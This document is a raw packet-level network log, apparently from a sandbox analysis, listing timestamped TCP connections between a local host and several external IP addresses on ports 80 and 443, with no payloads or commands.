Sep 27, 2024 00:15:08.989851952 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989881039 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.990041018 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.990057945 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.990070105 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.990081072 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.990084887 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.990093946 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.990122080 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.990149021 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.990194082 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.990240097 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.991153002 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.991189003 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.991199017 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.991203070 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.991235018 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.991297007 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.991364956 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.991375923 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.991394043 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.991403103 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.991405964 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.991409063 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.991426945 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.991446972 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.075520992 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.075544119 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.075555086 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.075604916 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.075617075 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.075642109 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.075658083 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.075670004 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.075681925 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.075730085 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.075756073 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.075767994 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.075778961 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.075792074 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.075803995 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.075805902 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.075829029 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.075859070 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.075869083 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.075881004 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.075891972 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.075911045 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.075927019 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.075939894 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.075979948 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076009035 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076020002 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076030970 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076049089 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076049089 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076061964 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076071978 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076093912 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076119900 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076174974 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076188087 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076200962 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076211929 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076224089 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076240063 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076242924 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076267004 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076277971 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076289892 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076316118 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076348066 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076375961 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076387882 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076400042 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076411009 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076420069 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076421976 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076435089 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076453924 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076486111 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076590061 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076601028 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076612949 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076623917 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076630116 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076636076 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076648951 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076661110 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076668024 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076692104 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076706886 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076714993 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076756954 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076822996 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076834917 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076845884 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076857090 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076868057 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076868057 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076879978 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076889038 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076891899 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076915026 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076931000 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.076952934 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.076996088 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077038050 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077050924 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077060938 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077073097 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077084064 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077086926 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077142954 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077172041 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077224016 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077234983 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077245951 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077258110 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077266932 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077270031 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077284098 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077296972 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077325106 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077359915 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077375889 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077388048 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077399969 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077404976 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077431917 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077461004 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077532053 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077543020 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077553988 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077564955 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077575922 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077605009 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077692986 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077704906 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077714920 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077725887 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077733040 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077738047 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077749968 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077760935 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077763081 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077774048 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077785969 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077795029 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077821970 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077836990 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077874899 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077887058 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077915907 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077924013 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077935934 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077946901 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077949047 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077960014 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077965975 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.077972889 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.077999115 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078027964 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078058004 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078069925 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078079939 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078092098 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078100920 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078110933 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078118086 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078124046 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078135967 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078150034 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078174114 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078346968 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078357935 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078368902 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078380108 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078389883 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078389883 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078402996 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078413010 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078421116 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078429937 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078442097 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078452110 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078453064 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078469992 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078474045 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078484058 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078495979 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078504086 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078506947 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078521013 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078531027 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078533888 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078551054 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078564882 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078605890 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078784943 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078798056 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078808069 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078830957 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078845024 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.078855991 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.078897953 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.096643925 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 27, 2024 00:15:09.096735954 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 27, 2024 00:15:09.096837044 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 27, 2024 00:15:09.097376108 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 27, 2024 00:15:09.097394943 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 27, 2024 00:15:09.097405910 CEST	49767	443	192.168.2.4	104.21.4.136
Sep 27, 2024 00:15:09.097410917 CEST	443	49767	104.21.4.136	192.168.2.4
Sep 27, 2024 00:15:09.115778923 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:09.115813971 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:09.115895033 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:09.116359949 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:09.116377115 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:09.164350986 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.164402962 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.164437056 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.164443016 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.164463997 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.164470911 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.164519072 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.164525032 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.164537907 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.164577007 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.164577961 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.164612055 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.164645910 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.164654016 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.164671898 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.164696932 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.164735079 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.164737940 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.164760113 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.164773941 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.164792061 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.164814949 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.164827108 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:09.164875984 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:09.235542059 CEST	49769	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:09.235594988 CEST	443	49769	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:09.235671043 CEST	49769	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:09.235909939 CEST	49769	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:09.235927105 CEST	443	49769	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:09.585711002 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:09.585799932 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:09.588037968 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:09.588057041 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:09.588824034 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:09.590254068 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:09.590305090 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:09.590342045 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:09.941803932 CEST	443	49769	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:09.941873074 CEST	49769	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:09.942406893 CEST	49769	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:09.942420006 CEST	443	49769	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:09.944413900 CEST	49769	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:09.944422960 CEST	443	49769	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:10.034194946 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:10.034291029 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:10.034380913 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:10.034583092 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:10.034606934 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:10.034620047 CEST	49768	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:10.034626007 CEST	443	49768	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:10.053194046 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:10.053232908 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:10.053307056 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:10.053642988 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:10.053658009 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:10.771353960 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:10.771431923 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:10.773407936 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:10.773422003 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:10.773665905 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:10.776431084 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:10.776467085 CEST	49770	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:10.776499987 CEST	443	49770	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:10.880944967 CEST	443	49769	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:10.881021023 CEST	49769	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:10.881038904 CEST	443	49769	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:10.881095886 CEST	49769	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:10.881416082 CEST	443	49769	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:10.881469011 CEST	443	49769	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:10.881520033 CEST	49769	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:10.881798029 CEST	49769	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:10.881808996 CEST	443	49769	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:10.898087025 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:10.904356956 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279222965 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279253960 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279267073 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279278040 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279289961 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279300928 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279313087 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279313087 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.279325962 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279359102 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.279359102 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.279412985 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.279470921 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279484034 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279494047 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279505968 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279517889 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279529095 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279531956 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.279540062 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279548883 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.279552937 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.279570103 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.279589891 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.279653072 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280144930 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280157089 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280169010 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280179977 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280189991 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280201912 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280211926 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280214071 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280231953 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280232906 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280245066 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280256033 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280258894 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280275106 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:11.280277967 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:11.280286074 CEST	49764	80	192.168.2.4	147.45.44.104
